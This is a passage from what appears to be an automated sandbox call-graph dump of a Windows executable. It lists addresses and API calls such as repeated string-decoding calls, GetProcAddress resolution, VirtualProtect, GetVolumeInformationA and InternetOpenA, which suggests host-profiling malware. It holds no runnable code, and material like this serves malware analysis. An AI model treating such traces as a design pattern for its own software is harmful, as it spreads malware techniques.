145b10 13645->13648 13646->13645 13647 1469d8 ExitProcess 13646->13647 13649 145b1d 13648->13649 13650 14a740 lstrcpy 13649->13650 13651 145b2e 13650->13651 13884 14a820 lstrlen 13651->13884 13654 14a820 2 API calls 13655 145b64 13654->13655 13656 14a820 2 API calls 13655->13656 13657 145b74 13656->13657 13888 146430 13657->13888 13660 14a820 2 API calls 13661 145b93 13660->13661 13662 14a820 2 API calls 13661->13662 13663 145ba0 13662->13663 13664 14a820 2 API calls 13663->13664 13665 145bad 13664->13665 13666 14a820 2 API calls 13665->13666 13667 145bf9 13666->13667 13897 1326a0 13667->13897 13675 145cc3 13676 146430 lstrcpy 13675->13676 13677 145cd5 13676->13677 13678 14a7a0 lstrcpy 13677->13678 13679 145cf2 13678->13679 13680 14a9b0 4 API calls 13679->13680 13681 145d0a 13680->13681 13682 14a8a0 lstrcpy 13681->13682 13683 145d16 13682->13683 13684 14a9b0 4 API calls 13683->13684 13685 145d3a 13684->13685 13686 14a8a0 lstrcpy 13685->13686 13687 145d46 13686->13687 13688 14a9b0 4 API calls 13687->13688 13689 145d6a 13688->13689 13690 14a8a0 lstrcpy 13689->13690 13691 145d76 13690->13691 13692 14a740 lstrcpy 13691->13692 13693 145d9e 13692->13693 14623 147500 GetWindowsDirectoryA 13693->14623 13696 14a7a0 lstrcpy 13697 145db8 13696->13697 14633 134880 13697->14633 13699 145dbe 14778 1417a0 13699->14778 13701 145dc6 13702 14a740 lstrcpy 13701->13702 13703 145de9 13702->13703 13704 131590 lstrcpy 13703->13704 13705 145dfd 13704->13705 14794 135960 13705->14794 13707 145e03 14938 141050 13707->14938 13709 145e0e 13710 14a740 lstrcpy 13709->13710 13711 145e32 13710->13711 13712 131590 lstrcpy 13711->13712 13713 145e46 13712->13713 13714 135960 34 API calls 13713->13714 13715 145e4c 13714->13715 14942 140d90 13715->14942 13717 145e57 13718 14a740 lstrcpy 13717->13718 13719 145e79 13718->13719 13720 131590 lstrcpy 13719->13720 13721 145e8d 13720->13721 13722 135960 34 API calls 13721->13722 13723 145e93 13722->13723 14949 140f40 13723->14949 13725 145e9e 13726 131590 lstrcpy 13725->13726 13727 145eb5 13726->13727 14954 141a10 13727->14954 13729 145eba 13730 14a740 lstrcpy 13729->13730 13731 145ed6 13730->13731 15298 134fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13731->15298 13733 145edb 13734 131590 lstrcpy 13733->13734 13735 145f5b 13734->13735 15305 140740 13735->15305 13737 145f60 13738 14a740 lstrcpy 13737->13738 13739 145f86 13738->13739 13740 131590 lstrcpy 13739->13740 13741 145f9a 13740->13741 13742 135960 34 API calls 13741->13742 13837 1345d1 RtlAllocateHeap 13836->13837 13840 134621 VirtualProtect 13837->13840 13840->13485 13841->13572 13844 1310c2 codecvt 13842->13844 13843 1310fd 13843->13602 13844->13843 13845 1310e2 VirtualFree 13844->13845 13845->13843 13847 131233 GlobalMemoryStatusEx 13846->13847 13847->13605 13848->13629 13850 14a7c2 13849->13850 13851 14a7ec 13850->13851 13852 14a7da lstrcpy 13850->13852 13851->13634 13852->13851 13854 14a740 lstrcpy 13853->13854 13855 146833 13854->13855 13856 14a9b0 4 API calls 13855->13856 13857 146845 13856->13857 13858 14a8a0 lstrcpy 13857->13858 13859 14684e 13858->13859 13860 14a9b0 4 API calls 13859->13860 13861 146867 13860->13861 13862 14a8a0 lstrcpy 13861->13862 13863 146870 13862->13863 13864 14a9b0 4 API calls 13863->13864 13865 14688a 13864->13865 13866 14a8a0 lstrcpy 13865->13866 13867 146893 13866->13867 13868 14a9b0 4 API calls 13867->13868 13869 1468ac 13868->13869 13870 14a8a0 lstrcpy 13869->13870 13871 1468b5 13870->13871 13872 14a9b0 4 API calls 13871->13872 13873 1468cf 13872->13873 13874 14a8a0 lstrcpy 13873->13874 13875 1468d8 13874->13875 13876 14a9b0 4 API calls 13875->13876 13877 1468f3 13876->13877 13878 14a8a0 lstrcpy 13877->13878 13879 1468fc 13878->13879 13880 14a7a0 lstrcpy 13879->13880 13881 146910 13880->13881 13881->13641 13883 14a812 13882->13883 13883->13644 13885 14a83f 13884->13885 13886 145b54 13885->13886 13887 14a87b lstrcpy 13885->13887 13886->13654 13887->13886 13889 14a8a0 lstrcpy 13888->13889 13890 146443 13889->13890 13891 14a8a0 lstrcpy 13890->13891 13892 146455 13891->13892 13893 14a8a0 lstrcpy 13892->13893 13894 146467 13893->13894 13895 14a8a0 lstrcpy 13894->13895 13896 145b86 13895->13896 13896->13660 13898 1345c0 2 API calls 13897->13898 13899 1326b4 13898->13899 13900 1345c0 2 API calls 13899->13900 13901 1326d7 13900->13901 13902 1345c0 2 API calls 13901->13902 13903 1326f0 13902->13903 13904 1345c0 2 API calls 13903->13904 13905 132709 13904->13905 13906 1345c0 2 API calls 13905->13906 13907 132736 13906->13907 13908 1345c0 2 API calls 13907->13908 13909 13274f 13908->13909 13910 1345c0 2 API calls 13909->13910 13911 132768 13910->13911 13912 1345c0 2 API calls 13911->13912 13913 132795 13912->13913 13914 1345c0 2 API calls 13913->13914 13915 1327ae 13914->13915 13916 1345c0 2 API calls 13915->13916 13917 1327c7 13916->13917 13918 1345c0 2 API calls 13917->13918 13919 1327e0 13918->13919 13920 1345c0 2 API calls 13919->13920 13921 1327f9 13920->13921 13922 1345c0 2 API calls 13921->13922 13923 132812 13922->13923 13924 1345c0 2 API calls 13923->13924 13925 13282b 13924->13925 13926 1345c0 2 API calls 13925->13926 13927 132844 13926->13927 13928 1345c0 2 API calls 13927->13928 13929 13285d 13928->13929 13930 1345c0 2 API calls 13929->13930 13931 132876 13930->13931 13932 1345c0 2 API calls 13931->13932 13933 13288f 13932->13933 13934 1345c0 2 API calls 13933->13934 13935 1328a8 13934->13935 13936 1345c0 2 API calls 13935->13936 13937 1328c1 13936->13937 13938 1345c0 2 API calls 13937->13938 13939 1328da 13938->13939 13940 1345c0 2 API calls 13939->13940 13941 1328f3 13940->13941 13942 1345c0 2 API calls 13941->13942 13943 13290c 13942->13943 13944 1345c0 2 API calls 13943->13944 13945 132925 13944->13945 13946 1345c0 2 API calls 13945->13946 13947 13293e 13946->13947 13948 1345c0 2 API calls 13947->13948 13949 132957 13948->13949 13950 1345c0 2 API calls 13949->13950 13951 132970 13950->13951 13952 1345c0 2 API calls 13951->13952 13953 132989 13952->13953 13954 1345c0 2 API calls 13953->13954 13955 1329a2 13954->13955 13956 1345c0 2 API calls 13955->13956 13957 1329bb 13956->13957 13958 1345c0 2 API calls 13957->13958 13959 1329d4 13958->13959 13960 1345c0 2 API calls 13959->13960 13961 1329ed 13960->13961 13962 1345c0 2 API calls 13961->13962 13963 132a06 13962->13963 13964 1345c0 2 API calls 13963->13964 13965 132a1f 13964->13965 13966 1345c0 2 API calls 13965->13966 13967 132a38 13966->13967 13968 1345c0 2 API calls 13967->13968 13969 132a51 13968->13969 13970 1345c0 2 API calls 13969->13970 13971 132a6a 13970->13971 13972 1345c0 2 API calls 13971->13972 13973 132a83 13972->13973 13974 1345c0 2 API calls 13973->13974 13975 132a9c 13974->13975 13976 1345c0 2 API calls 13975->13976 13977 132ab5 13976->13977 13978 1345c0 2 API calls 13977->13978 13979 132ace 13978->13979 13980 1345c0 2 API calls 13979->13980 13981 132ae7 13980->13981 13982 1345c0 2 API calls 13981->13982 13983 132b00 13982->13983 13984 1345c0 2 API calls 13983->13984 13985 132b19 13984->13985 13986 1345c0 2 API calls 13985->13986 13987 132b32 13986->13987 13988 1345c0 2 API calls 13987->13988 13989 132b4b 13988->13989 13990 1345c0 2 API calls 13989->13990 13991 132b64 13990->13991 13992 1345c0 2 API calls 13991->13992 13993 132b7d 13992->13993 13994 1345c0 2 API calls 13993->13994 13995 132b96 13994->13995 13996 1345c0 2 API calls 13995->13996 13997 132baf 13996->13997 13998 1345c0 2 API calls 13997->13998 13999 132bc8 13998->13999 14000 1345c0 2 API calls 13999->14000 14001 132be1 14000->14001 14002 1345c0 2 API calls 14001->14002 14003 132bfa 14002->14003 14004 1345c0 2 API calls 14003->14004 14005 132c13 14004->14005 14006 1345c0 2 API calls 14005->14006 14007 132c2c 14006->14007 14008 1345c0 2 API calls 14007->14008 14009 132c45 14008->14009 14010 1345c0 2 API calls 14009->14010 14011 132c5e 14010->14011 14012 1345c0 2 API calls 14011->14012 14013 132c77 14012->14013 14014 1345c0 2 API calls 14013->14014 14015 132c90 14014->14015 14016 1345c0 2 API calls 14015->14016 14017 132ca9 14016->14017 14018 1345c0 2 API calls 14017->14018 14019 132cc2 14018->14019 14020 1345c0 2 API calls 14019->14020 14021 132cdb 14020->14021 14022 1345c0 2 API calls 14021->14022 14023 132cf4 14022->14023 14024 1345c0 2 API calls 14023->14024 14025 132d0d 14024->14025 14026 1345c0 2 API calls 14025->14026 14027 132d26 14026->14027 14028 1345c0 2 API calls 14027->14028 14029 132d3f 14028->14029 14030 1345c0 2 API calls 14029->14030 14031 132d58 14030->14031 14032 1345c0 2 API calls 14031->14032 14033 132d71 14032->14033 14034 1345c0 2 API calls 14033->14034 14035 132d8a 14034->14035 14036 1345c0 2 API calls 14035->14036 14037 132da3 14036->14037 14038 1345c0 2 API calls 14037->14038 14039 132dbc 14038->14039 14040 1345c0 2 API calls 14039->14040 14041 132dd5 14040->14041 14042 1345c0 2 API calls 14041->14042 14043 132dee 14042->14043 14044 1345c0 2 API calls 14043->14044 14045 132e07 14044->14045 14046 1345c0 2 API calls 14045->14046 14047 132e20 14046->14047 14048 1345c0 2 API calls 14047->14048 14049 132e39 14048->14049 14050 1345c0 2 API calls 14049->14050 14051 132e52 14050->14051 14052 1345c0 2 API calls 14051->14052 14053 132e6b 14052->14053 14054 1345c0 2 API calls 14053->14054 14055 132e84 14054->14055 14056 1345c0 2 API calls 14055->14056 14057 132e9d 14056->14057 14058 1345c0 2 API calls 14057->14058 14059 132eb6 14058->14059 14060 1345c0 2 API calls 14059->14060 14061 132ecf 14060->14061 14062 1345c0 2 API calls 14061->14062 14063 132ee8 14062->14063 14064 1345c0 2 API calls 14063->14064 14065 132f01 14064->14065 14066 1345c0 2 API calls 14065->14066 14067 132f1a 14066->14067 14068 1345c0 2 API calls 14067->14068 14069 132f33 14068->14069 14070 1345c0 2 API calls 14069->14070 14071 132f4c 14070->14071 14072 1345c0 2 API calls 14071->14072 14073 132f65 14072->14073 14074 1345c0 2 API calls 14073->14074 14075 132f7e 14074->14075 14076 1345c0 2 API calls 14075->14076 14077 132f97 14076->14077 14078 1345c0 2 API calls 14077->14078 14079 132fb0 14078->14079 14080 1345c0 2 API calls 14079->14080 14081 132fc9 14080->14081 14082 1345c0 2 API calls 14081->14082 14083 132fe2 14082->14083 14084 1345c0 2 API calls 14083->14084 14085 132ffb 14084->14085 14086 1345c0 2 API calls 14085->14086 14087 133014 14086->14087 14088 1345c0 2 API calls 14087->14088 14089 13302d 14088->14089 14090 1345c0 2 API calls 14089->14090 14091 133046 14090->14091 14092 1345c0 2 API calls 14091->14092 14093 13305f 14092->14093 14094 1345c0 2 API calls 14093->14094 14095 133078 14094->14095 14096 1345c0 2 API calls 14095->14096 14097 133091 14096->14097 14098 1345c0 2 API calls 14097->14098 14099 1330aa 14098->14099 14100 1345c0 2 API calls 14099->14100 14101 1330c3 14100->14101 14102 1345c0 2 API calls 14101->14102 14103 1330dc 14102->14103 14104 1345c0 2 API calls 14103->14104 14105 1330f5 14104->14105 14106 1345c0 2 API calls 14105->14106 14107 13310e 14106->14107 14108 1345c0 2 API calls 14107->14108 14109 133127 14108->14109 14110 1345c0 2 API calls 14109->14110 14111 133140 14110->14111 14112 1345c0 2 API calls 14111->14112 14113 133159 14112->14113 14114 1345c0 2 API calls 14113->14114 14115 133172 14114->14115 14116 1345c0 2 API calls 14115->14116 14117 13318b 14116->14117 14118 1345c0 2 API calls 14117->14118 14119 1331a4 14118->14119 14120 1345c0 2 API calls 14119->14120 14121 1331bd 14120->14121 14122 1345c0 2 API calls 14121->14122 14123 1331d6 14122->14123 14124 1345c0 2 API calls 14123->14124 14125 1331ef 14124->14125 14126 1345c0 2 API calls 14125->14126 14127 133208 14126->14127 14128 1345c0 2 API calls 14127->14128 14129 133221 14128->14129 14130 1345c0 2 API calls 14129->14130 14131 13323a 14130->14131 14132 1345c0 2 API calls 14131->14132 14133 133253 14132->14133 14134 1345c0 2 API calls 14133->14134 14135 13326c 14134->14135 14136 1345c0 2 API calls 14135->14136 14137 133285 14136->14137 14138 1345c0 2 API calls 14137->14138 14139 13329e 14138->14139 14140 1345c0 2 API calls 14139->14140 14141 1332b7 14140->14141 14142 1345c0 2 API calls 14141->14142 14143 1332d0 14142->14143 14144 1345c0 2 API calls 14143->14144 14145 1332e9 14144->14145 14146 1345c0 2 API calls 14145->14146 14147 133302 14146->14147 14148 1345c0 2 API calls 14147->14148 14149 13331b 14148->14149 14150 1345c0 2 API calls 14149->14150 14151 133334 14150->14151 14152 1345c0 2 API calls 14151->14152 14153 13334d 14152->14153 14154 1345c0 2 API calls 14153->14154 14155 133366 14154->14155 14156 1345c0 2 API calls 14155->14156 14157 13337f 14156->14157 14158 1345c0 2 API calls 14157->14158 14159 133398 14158->14159 14160 1345c0 2 API calls 14159->14160 14161 1333b1 14160->14161 14162 1345c0 2 API calls 14161->14162 14163 1333ca 14162->14163 14164 1345c0 2 API calls 14163->14164 14165 1333e3 14164->14165 14166 1345c0 2 API calls 14165->14166 14167 1333fc 14166->14167 14168 1345c0 2 API calls 14167->14168 14169 133415 14168->14169 14170 1345c0 2 API calls 14169->14170 14171 13342e 14170->14171 14172 1345c0 2 API calls 14171->14172 14173 133447 14172->14173 14174 1345c0 2 API calls 14173->14174 14175 133460 14174->14175 14176 1345c0 2 API calls 14175->14176 14177 133479 14176->14177 14178 1345c0 2 API calls 14177->14178 14179 133492 14178->14179 14180 1345c0 2 API calls 14179->14180 14181 1334ab 14180->14181 14182 1345c0 2 API calls 14181->14182 14183 1334c4 14182->14183 14184 1345c0 2 API calls 14183->14184 14185 1334dd 14184->14185 14186 1345c0 2 API calls 14185->14186 14187 1334f6 14186->14187 14188 1345c0 2 API calls 14187->14188 14189 13350f 14188->14189 14190 1345c0 2 API calls 14189->14190 14191 133528 14190->14191 14192 1345c0 2 API calls 14191->14192 14193 133541 14192->14193 14194 1345c0 2 API calls 14193->14194 14195 13355a 14194->14195 14196 1345c0 2 API calls 14195->14196 14197 133573 14196->14197 14198 1345c0 2 API calls 14197->14198 14199 13358c 14198->14199 14200 1345c0 2 API calls 14199->14200 14201 1335a5 14200->14201 14202 1345c0 2 API calls 14201->14202 14203 1335be 14202->14203 14204 1345c0 2 API calls 14203->14204 14205 1335d7 14204->14205 14206 1345c0 2 API calls 14205->14206 14207 1335f0 14206->14207 14208 1345c0 2 API calls 14207->14208 14209 133609 14208->14209 14210 1345c0 2 API calls 14209->14210 14211 133622 14210->14211 14212 1345c0 2 API calls 14211->14212 14213 13363b 14212->14213 14214 1345c0 2 API calls 14213->14214 14215 133654 14214->14215 14216 1345c0 2 API calls 14215->14216 14217 13366d 14216->14217 14218 1345c0 2 API calls 14217->14218 14219 133686 14218->14219 14220 1345c0 2 API calls 14219->14220 14221 13369f 14220->14221 14222 1345c0 2 API calls 14221->14222 14223 1336b8 14222->14223 14224 1345c0 2 API calls 14223->14224 14225 1336d1 14224->14225 14226 1345c0 2 API calls 14225->14226 14227 1336ea 14226->14227 14228 1345c0 2 API calls 14227->14228 14229 133703 14228->14229 14230 1345c0 2 API calls 14229->14230 14231 13371c 14230->14231 14232 1345c0 2 API calls 14231->14232 14233 133735 14232->14233 14234 1345c0 2 API calls 14233->14234 14235 13374e 14234->14235 14236 1345c0 2 API calls 14235->14236 14237 133767 14236->14237 14238 1345c0 2 API calls 14237->14238 14239 133780 14238->14239 14240 1345c0 2 API calls 14239->14240 14241 133799 14240->14241 14242 1345c0 2 API calls 14241->14242 14243 1337b2 14242->14243 14244 1345c0 2 API calls 14243->14244 14245 1337cb 14244->14245 14246 1345c0 2 API calls 14245->14246 14247 1337e4 14246->14247 14248 1345c0 2 API calls 14247->14248 14249 1337fd 14248->14249 14250 1345c0 2 API calls 14249->14250 14251 133816 14250->14251 14252 1345c0 2 API calls 14251->14252 14253 13382f 14252->14253 14254 1345c0 2 API calls 14253->14254 14255 133848 14254->14255 14256 1345c0 2 API calls 14255->14256 14257 133861 14256->14257 14258 1345c0 2 API calls 14257->14258 14259 13387a 14258->14259 14260 1345c0 2 API calls 14259->14260 14261 133893 14260->14261 14262 1345c0 2 API calls 14261->14262 14263 1338ac 14262->14263 14264 1345c0 2 API calls 14263->14264 14265 1338c5 14264->14265 14266 1345c0 2 API calls 14265->14266 14267 1338de 14266->14267 14268 1345c0 2 API calls 14267->14268 14269 1338f7 14268->14269 14270 1345c0 2 API calls 14269->14270 14271 133910 14270->14271 14272 1345c0 2 API calls 14271->14272 14273 133929 14272->14273 14274 1345c0 2 API calls 14273->14274 14275 133942 14274->14275 14276 1345c0 2 API calls 14275->14276 14277 13395b 14276->14277 14278 1345c0 2 API calls 14277->14278 14279 133974 14278->14279 14280 1345c0 2 API calls 14279->14280 14281 13398d 14280->14281 14282 1345c0 2 API calls 14281->14282 14283 1339a6 14282->14283 14284 1345c0 2 API calls 14283->14284 14285 1339bf 14284->14285 14286 1345c0 2 API calls 14285->14286 14287 1339d8 14286->14287 14288 1345c0 2 API calls 14287->14288 14289 1339f1 14288->14289 14290 1345c0 2 API calls 14289->14290 14291 133a0a 14290->14291 14292 1345c0 2 API calls 14291->14292 14293 133a23 14292->14293 14294 1345c0 2 API calls 14293->14294 14295 133a3c 14294->14295 14296 1345c0 2 API calls 14295->14296 14297 133a55 14296->14297 14298 1345c0 2 API calls 14297->14298 14299 133a6e 14298->14299 14300 1345c0 2 API calls 14299->14300 14301 133a87 14300->14301 14302 1345c0 2 API calls 14301->14302 14303 133aa0 14302->14303 14304 1345c0 2 API calls 14303->14304 14305 133ab9 14304->14305 14306 1345c0 2 API calls 14305->14306 14307 133ad2 14306->14307 14308 1345c0 2 API calls 14307->14308 14309 133aeb 14308->14309 14310 1345c0 2 API calls 14309->14310 14311 133b04 14310->14311 14312 1345c0 2 API calls 14311->14312 14313 133b1d 14312->14313 14314 1345c0 2 API calls 14313->14314 14315 133b36 14314->14315 14316 1345c0 2 API calls 14315->14316 14317 133b4f 14316->14317 14318 1345c0 2 API calls 14317->14318 14319 133b68 14318->14319 14320 1345c0 2 API calls 14319->14320 14321 133b81 14320->14321 14322 1345c0 2 API calls 14321->14322 14323 133b9a 14322->14323 14324 1345c0 2 API calls 14323->14324 14325 133bb3 14324->14325 14326 1345c0 2 API calls 14325->14326 14327 133bcc 14326->14327 14328 1345c0 2 API calls 14327->14328 14329 133be5 14328->14329 14330 1345c0 2 API calls 14329->14330 14331 133bfe 14330->14331 14332 1345c0 2 API calls 14331->14332 14333 133c17 14332->14333 14334 1345c0 2 API calls 14333->14334 14335 133c30 14334->14335 14336 1345c0 2 API calls 14335->14336 14337 133c49 14336->14337 14338 1345c0 2 API calls 14337->14338 14339 133c62 14338->14339 14340 1345c0 2 API calls 14339->14340 14341 133c7b 14340->14341 14342 1345c0 2 API calls 14341->14342 14343 133c94 14342->14343 14344 1345c0 2 API calls 14343->14344 14345 133cad 14344->14345 14346 1345c0 2 API calls 14345->14346 14347 133cc6 14346->14347 14348 1345c0 2 API calls 14347->14348 14349 133cdf 14348->14349 14350 1345c0 2 API calls 14349->14350 14351 133cf8 14350->14351 14352 1345c0 2 API calls 14351->14352 14353 133d11 14352->14353 14354 1345c0 2 API calls 14353->14354 14355 133d2a 14354->14355 14356 1345c0 2 API calls 14355->14356 14357 133d43 14356->14357 14358 1345c0 2 API calls 14357->14358 14359 133d5c 14358->14359 14360 1345c0 2 API calls 14359->14360 14361 133d75 14360->14361 14362 1345c0 2 API calls 14361->14362 14363 133d8e 14362->14363 14364 1345c0 2 API calls 14363->14364 14365 133da7 14364->14365 14366 1345c0 2 API calls 14365->14366 14367 133dc0 14366->14367 14368 1345c0 2 API calls 14367->14368 14369 133dd9 14368->14369 14370 1345c0 2 API calls 14369->14370 14371 133df2 14370->14371 14372 1345c0 2 API calls 14371->14372 14373 133e0b 14372->14373 14374 1345c0 2 API calls 14373->14374 14375 133e24 14374->14375 14376 1345c0 2 API calls 14375->14376 14377 133e3d 14376->14377 14378 1345c0 2 API calls 14377->14378 14379 133e56 14378->14379 14380 1345c0 2 API calls 14379->14380 14381 133e6f 14380->14381 14382 1345c0 2 API calls 14381->14382 14383 133e88 14382->14383 14384 1345c0 2 API calls 14383->14384 14385 133ea1 14384->14385 14386 1345c0 2 API calls 14385->14386 14387 133eba 14386->14387 14388 1345c0 2 API calls 14387->14388 14389 133ed3 14388->14389 14390 1345c0 2 API calls 14389->14390 14391 133eec 14390->14391 14392 1345c0 2 API calls 14391->14392 14393 133f05 14392->14393 14394 1345c0 2 API calls 14393->14394 14395 133f1e 14394->14395 14396 1345c0 2 API calls 14395->14396 14397 133f37 14396->14397 14398 1345c0 2 API calls 14397->14398 14399 133f50 14398->14399 14400 1345c0 2 API calls 14399->14400 14401 133f69 14400->14401 14402 1345c0 2 API calls 14401->14402 14403 133f82 14402->14403 14404 1345c0 2 API calls 14403->14404 14405 133f9b 14404->14405 14406 1345c0 2 API calls 14405->14406 14407 133fb4 14406->14407 14408 1345c0 2 API calls 14407->14408 14409 133fcd 14408->14409 14410 1345c0 2 API calls 14409->14410 14411 133fe6 14410->14411 14412 1345c0 2 API calls 14411->14412 14413 133fff 14412->14413 14414 1345c0 2 API calls 14413->14414 14415 134018 14414->14415 14416 1345c0 2 API calls 14415->14416 14417 134031 14416->14417 14418 1345c0 2 API calls 14417->14418 14419 13404a 14418->14419 14420 1345c0 2 API calls 14419->14420 14421 134063 14420->14421 14422 1345c0 2 API calls 14421->14422 14423 13407c 14422->14423 14424 1345c0 2 API calls 14423->14424 14425 134095 14424->14425 14426 1345c0 2 API calls 14425->14426 14427 1340ae 14426->14427 14428 1345c0 2 API calls 14427->14428 14429 1340c7 14428->14429 14430 1345c0 2 API calls 14429->14430 14431 1340e0 14430->14431 14432 1345c0 2 API calls 14431->14432 14433 1340f9 14432->14433 14434 1345c0 2 API calls 14433->14434 14435 134112 14434->14435 14436 1345c0 2 API calls 14435->14436 14437 13412b 14436->14437 14438 1345c0 2 API calls 14437->14438 14439 134144 14438->14439 14440 1345c0 2 API calls 14439->14440 14441 13415d 14440->14441 14442 1345c0 2 API calls 14441->14442 14443 134176 14442->14443 14444 1345c0 2 API calls 14443->14444 14445 13418f 14444->14445 14446 1345c0 2 API calls 14445->14446 14447 1341a8 14446->14447 14448 1345c0 2 API calls 14447->14448 14449 1341c1 14448->14449 14450 1345c0 2 API calls 14449->14450 14451 1341da 14450->14451 14452 1345c0 2 API calls 14451->14452 14453 1341f3 14452->14453 14454 1345c0 2 API calls 14453->14454 14455 13420c 14454->14455 14456 1345c0 2 API calls 14455->14456 14457 134225 14456->14457 14458 1345c0 2 API calls 14457->14458 14459 13423e 14458->14459 14460 1345c0 2 API calls 14459->14460 14461 134257 14460->14461 14462 1345c0 2 API calls 14461->14462 14463 134270 14462->14463 14464 1345c0 2 API calls 14463->14464 14465 134289 14464->14465 14466 1345c0 2 API calls 14465->14466 14467 1342a2 14466->14467 14468 1345c0 2 API calls 14467->14468 14469 1342bb 14468->14469 14470 1345c0 2 API calls 14469->14470 14471 1342d4 14470->14471 14472 1345c0 2 API calls 14471->14472 14473 1342ed 14472->14473 14474 1345c0 2 API calls 14473->14474 14475 134306 14474->14475 14476 1345c0 2 API calls 14475->14476 14477 13431f 14476->14477 14478 1345c0 2 API calls 14477->14478 14479 134338 14478->14479 14480 1345c0 2 API calls 14479->14480 14481 134351 14480->14481 14482 1345c0 2 API calls 14481->14482 14483 13436a 14482->14483 14484 1345c0 2 API calls 14483->14484 14485 134383 14484->14485 14486 1345c0 2 API calls 14485->14486 14487 13439c 14486->14487 14488 1345c0 2 API calls 14487->14488 14489 1343b5 14488->14489 14490 1345c0 2 API calls 14489->14490 14491 1343ce 14490->14491 14492 1345c0 2 API calls 14491->14492 14493 1343e7 14492->14493 14494 1345c0 2 API calls 14493->14494 14495 134400 14494->14495 14496 1345c0 2 API calls 14495->14496 14497 134419 14496->14497 14498 1345c0 2 API calls 14497->14498 14499 134432 14498->14499 14500 1345c0 2 API calls 14499->14500 14501 13444b 14500->14501 14502 1345c0 2 API calls 14501->14502 14503 134464 14502->14503 14504 1345c0 2 API calls 14503->14504 14505 13447d 14504->14505 14506 1345c0 2 API calls 14505->14506 14507 134496 14506->14507 14508 1345c0 2 API calls 14507->14508 14509 1344af 14508->14509 14510 1345c0 2 API calls 14509->14510 14511 1344c8 14510->14511 14512 1345c0 2 API calls 14511->14512 14513 1344e1 14512->14513 14514 1345c0 2 API calls 14513->14514 14515 1344fa 14514->14515 14516 1345c0 2 API calls 14515->14516 14517 134513 14516->14517 14518 1345c0 2 API calls 14517->14518 14519 13452c 14518->14519 14520 1345c0 2 API calls 14519->14520 14521 134545 14520->14521 14522 1345c0 2 API calls 14521->14522 14523 13455e 14522->14523 14524 1345c0 2 API calls 14523->14524 14525 134577 14524->14525 14526 1345c0 2 API calls 14525->14526 14527 134590 14526->14527 14528 1345c0 2 API calls 14527->14528 14529 1345a9 14528->14529 14530 149c10 14529->14530 14531 14a036 8 API calls 14530->14531 14532 149c20 43 API calls 14530->14532 14533 14a146 14531->14533 14534 14a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14531->14534 14532->14531 14535 14a216 14533->14535 14536 14a153 8 API calls 14533->14536 14534->14533 14537 14a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 14a298 14535->14538 14536->14535 14537->14538 14539 14a2a5 6 API calls 14538->14539 14540 14a337 14538->14540 14539->14540 14541 14a344 9 API calls 14540->14541 14542 14a41f 14540->14542 14541->14542 14543 14a4a2 14542->14543 14544 14a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14544 14545 14a4dc 14543->14545 14546 14a4ab GetProcAddress GetProcAddress 14543->14546 14544->14543 14547 14a515 14545->14547 14548 14a4e5 GetProcAddress GetProcAddress 14545->14548 14546->14545 14549 14a612 14547->14549 14550 14a522 10 API calls 14547->14550 14548->14547 14551 14a67d 14549->14551 14552 14a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14549->14552 14550->14549 14553 14a686 GetProcAddress 14551->14553 14554 14a69e 14551->14554 14552->14551 14553->14554 14555 14a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14554->14555 14556 145ca3 14554->14556 14555->14556 14557 131590 14556->14557 15678 131670 14557->15678 14560 14a7a0 lstrcpy 14561 1315b5 14560->14561 14562 14a7a0 lstrcpy 14561->14562 14563 1315c7 14562->14563 14564 14a7a0 lstrcpy 14563->14564 14565 1315d9 14564->14565 14566 14a7a0 lstrcpy 14565->14566 14567 131663 14566->14567 14568 145510 14567->14568 14569 145521 14568->14569 14570 14a820 2 API calls 14569->14570 14571 14552e 14570->14571 14572 14a820 2 API calls 14571->14572 14573 14553b 14572->14573 14574 14a820 2 API calls 14573->14574 14575 145548 14574->14575 14576 14a740 lstrcpy 14575->14576 14577 145555 14576->14577 14578 14a740 lstrcpy 14577->14578 14579 145562 14578->14579 14580 14a740 lstrcpy 14579->14580 14581 14556f 14580->14581 14582 14a740 lstrcpy 14581->14582 14618 14557c 14582->14618 14583 14a740 lstrcpy 14583->14618 14584 14a820 lstrlen lstrcpy 14584->14618 14585 1451f0 20 API calls 14585->14618 14586 145643 StrCmpCA 14586->14618 14587 1456a0 StrCmpCA 14588 1457dc 14587->14588 14587->14618 14589 14a8a0 lstrcpy 14588->14589 14590 1457e8 14589->14590 14591 14a820 2 API calls 14590->14591 14593 1457f6 14591->14593 14592 145856 StrCmpCA 14594 145991 14592->14594 14592->14618 14595 14a820 2 API calls 14593->14595 14597 14a8a0 lstrcpy 14594->14597 14596 145805 14595->14596 14598 131670 lstrcpy 14596->14598 14599 14599d 14597->14599 14619 145811 14598->14619 14600 14a820 2 API calls 14599->14600 14603 1459ab 14600->14603 14601 145a0b StrCmpCA 14605 145a16 Sleep 14601->14605 14606 145a28 14601->14606 14602 1452c0 25 API calls 14602->14618 14604 14a820 2 API calls 14603->14604 14608 1459ba 14604->14608 14605->14618 14609 14a8a0 lstrcpy 14606->14609 14607 14a7a0 lstrcpy 14607->14618 14610 131670 lstrcpy 14608->14610 14611 145a34 14609->14611 14610->14619 14612 14a820 2 API calls 14611->14612 14613 145a43 14612->14613 14614 14a820 2 API calls 14613->14614 14615 145a52 14614->14615 14617 131670 lstrcpy 14615->14617 14616 14578a StrCmpCA 14616->14618 14617->14619 14618->14583 14618->14584 14618->14585 14618->14586 14618->14587 14618->14592 14618->14601 14618->14602 14618->14607 14618->14616 14620 14593f StrCmpCA 14618->14620 14621 14a8a0 lstrcpy 14618->14621 14622 131590 lstrcpy 14618->14622 14619->13675 14620->14618 14621->14618 14622->14618 14624 147553 GetVolumeInformationA 14623->14624 14625 14754c 14623->14625 14626 147591 14624->14626 14625->14624 14627 1475fc GetProcessHeap RtlAllocateHeap 14626->14627 14628 147628 wsprintfA 14627->14628 14629 147619 14627->14629 14631 14a740 lstrcpy 14628->14631 14630 14a740 lstrcpy 14629->14630 14632 145da7 14630->14632 14631->14632 14632->13696 14634 14a7a0 lstrcpy 14633->14634 14635 134899 14634->14635 15687 1347b0 14635->15687 14637 1348a5 14638 14a740 lstrcpy 14637->14638 14639 1348d7 14638->14639 14640 14a740 lstrcpy 14639->14640 14641 1348e4 14640->14641 14642 14a740 lstrcpy 14641->14642 14643 1348f1 14642->14643 14644 14a740 lstrcpy 